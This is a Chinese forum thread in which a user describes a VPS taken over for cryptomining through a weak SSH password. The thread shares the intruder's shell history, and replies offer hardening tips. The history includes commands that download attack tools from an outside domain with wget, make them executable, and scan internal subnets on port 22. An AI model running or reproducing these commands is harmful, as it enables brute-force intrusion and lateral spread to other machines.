嘟嘟社区

一不小心被挖矿了

moe

本帖最后由 c菌 于 2022-2-15 23:16 编辑

防范意识薄弱,小鸡用的弱密码,没禁用密码登陆,今天登上机器看cpu100%,
马上意识到被挖矿了。看了下历史记录

  1. sudo -i
  2.   133  exit
  3.   134  nproc
  4.   135  lscpu
  5.   136  exit
  6.   137  nproc
  7.   138  exit
  8.   139  nproc
  9.   140  ls
  10.   141  ip r
  11.   142  exit
  12.   143  wget david1337.dev/brute
  13.   144  wget david1337.dev/banner
  14.   145  wget david1337.dev/ps
  15.   146  chmod +x *
  16.   147  ip r
  17.   148  ./ps 10.42 22
  18.   149  ./ps 192.168 22
  19.   150  ./ps 172.17 22
  20.   151  ls
  21.   152  exit
  22.   153  lscpu
  23.   154  ls
  24.   155  exit
  25.   156  top
  26.   157  exit
  27.   158  clear
  28.   159  ls

复制代码

淦塔皮燕纸 david1337.dev
拿到鸡第一步。修改密码,3种混合。修改22端口。开启bbr

toot 发表于 2022-2-15 23:16
拿到鸡第一步。修改密码,3种混合。修改22端口。开启bbr

不放心还是重装了
第一步不就是禁密码登录改成密钥么,
密钥还更方便
端口只对白名单ip开放,稳得一比,你密码设置123都没问题
这个矿工不专业,鞋套都不戴,差评
密钥,其他都是默认,dmit什么的开机就是密钥,更规范
https://hostloc.com/thread-957070-1-1.html

* Linux常用命令:rar a file1.rar file1 file2 dir1 同时压缩 ‘file1’, ‘file2’ 以及目录 ‘dir1’

* 资源 https://t.me/MJJ_aliyundrive
* MJJ频道 https://t.me/wearemjj
* Linux命令大全 https://www.linuxcool.com
* HostLoc频道 https://t.me/myhostloc
   
三个脚本被删除了。楼主有备份吗 发出来学习下